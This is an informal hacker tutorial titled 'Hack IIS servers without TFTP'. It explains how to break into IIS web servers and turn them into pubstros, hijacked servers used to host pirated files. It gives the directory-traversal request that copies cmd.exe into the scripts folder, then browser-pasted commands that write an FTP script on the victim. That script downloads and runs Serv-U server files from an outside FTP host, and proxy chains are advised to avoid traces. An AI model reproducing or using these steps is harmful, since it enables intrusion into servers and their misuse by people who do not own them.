Hack IIS servers without TFTP

Hack IIS servers without TFTP

How to upload without tftp
-------------------------------------------------------------------
requirements
A program such as proxychain
an anonymous ftp, or and old or slow pubstro ( i recommended the last one )
A lot of dumps to fill all your pubstro's
short story
-------------
Every pubstro builder starts with the tftp protocoll, but ass u know u have an p
roblem with the logfiles, if u cant delete them, leave the stro. I know it is ve
ry painfull to leave an very fast one, or huge one. But with this method, u dont
have to delete the logfiles if u an chain of proxy's "security first"
-------------
step 1. Copying the cmd.exe
First u have 2 copy the cmd.exe to another dir, that is accisable from iis, such
as /scripts /msadc
i take the scripts dir :
http://TARGETIP/scripts/..%255c..%2...ystem32\cmd.exe c:\inetpub\scripts\ft.exe
u have 2 use an other name than cmd.exe because cmd.exe would echo, and a rename
d file would it
as u see i used the name ft.exe, choose what u want !
step 2. explainetion about the first line
now i will tell something about the first line, if u get that u'll get all the l
ines !
ft.exe?/c+echo+open+FTPSERVER+FTPPORT+>>tftped.tx
/scripts/ft.exe <-- the new copyed cmd.exe
/scripts/ft.exe?/c+echo <-- the command the will write an text file on the targe
t system
/scripts/ft.exe?/c+echo+open <-- write open at the first line in a new file
/scripts/ft.exe?/c+echo+open+FTPSERVER+ <-- write open and FTP server in a new f
ile "open ftpserver"
/scripts/ft.exe?/c+echo+open+FTPSERVER+FTPPORT+ <-- same as above "open ftpserve
r ftpport"
/scripts/ft.exe?/c+echo+open+FTPSERVER+FTPPORT+>>tftped.tx give the write action
>>tftped.tx <-- thats is the new filename
I know it is a very short discription, but my englisch is horrible
a working ftp script, past these lines in your browser!
/scripts/ft.exe?/c+echo+open+123.123.123.123+21+>>tftped.tx
/scripts/ft.exe?/c+echo+billygates>>tftped.tx
/scripts/ft.exe?/c+echo+sucked>>tftped.tx
/scripts/ft.exe?/c+echo+get+ServUDaemon.exe>>tftped.tx
/scripts/ft.exe?/c+echo+get+ServUDaemon.ini>>tftped.tx
/scripts/ft.exe?/c+echo+quit>>tftped.tx
/scripts/ft.exe?/c+ftp.exe+-s:tftped.tx <-- this one give the action that he may
connect to the anonymous ftp or pubstro, and download there the servu files
how does the the tftped.tx file looks
-----------------------------------------------
open 123.123.123.123 21
billygates
sucked
get servudaemon.exe
get servudaemon.ini
quit
-----------------------------------------------
how to get a rid of it, just try the msdos ftp, and u know what u are doing
just enough talked try this enough times, and build enough stro's
dont know the source but thx for writing this one